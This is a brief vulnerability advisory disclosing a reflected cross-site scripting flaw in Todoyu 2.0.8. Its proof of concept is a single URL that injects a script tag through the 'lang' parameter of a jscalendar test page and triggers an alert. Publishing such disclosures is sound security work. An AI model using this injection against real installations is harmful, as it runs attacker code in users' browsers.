Home
Consulting
Advisories
Software
Articles
Contact

Todoyu 2.0.8 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Todoyu 2.0.8 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E


Copyright © 2018 AutoSec Tools LLC